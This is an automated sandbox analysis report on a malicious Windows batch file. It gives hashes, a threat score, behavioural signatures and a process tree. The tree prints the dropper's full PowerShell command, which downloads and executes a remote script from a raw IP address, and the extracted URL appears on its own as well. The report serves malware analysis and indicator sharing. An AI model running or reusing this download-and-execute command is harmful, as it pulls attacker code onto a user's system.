Analysis

  • max time kernel
    137s
  • max time network
    68s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    10-06-2020 04:10

General

  • Target

    a4aca9057cc10618a79ca8151afec479.bat

  • Size

    217B

  • MD5

    e1599c1a16de36f62fc0cc3af1ac017f

  • SHA1

    471367e29f86a7207c149cc46017217291006678

  • SHA256

    9bf30b808e78d5a9b262780e6b3c1479f5886a5026f781e38b057fa90d17ad43

  • SHA512

    e3cfa4040bd5cfcc5e80a141c88d7e2bfe44cccaf83bab2fac65b432c52d66aad6eaf23b607cc78970710d17eef2559adbe1b42ee482bb04e73536ddd214993e

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/a4aca9057cc10618a79ca8151afec479

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4aca9057cc10618a79ca8151afec479.bat"
    1⤵
      PID:640
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a4aca9057cc10618a79ca8151afec479');Invoke-HVGROAEJEA;Start-Sleep -s 10000"
        2⤵
          PID:904
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 708
            3⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:1148

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1148-0-0x0000000004A00000-0x0000000004A01000-memory.dmp

        Filesize

        4KB

      • memory/1148-1-0x0000000005130000-0x0000000005131000-memory.dmp

        Filesize

        4KB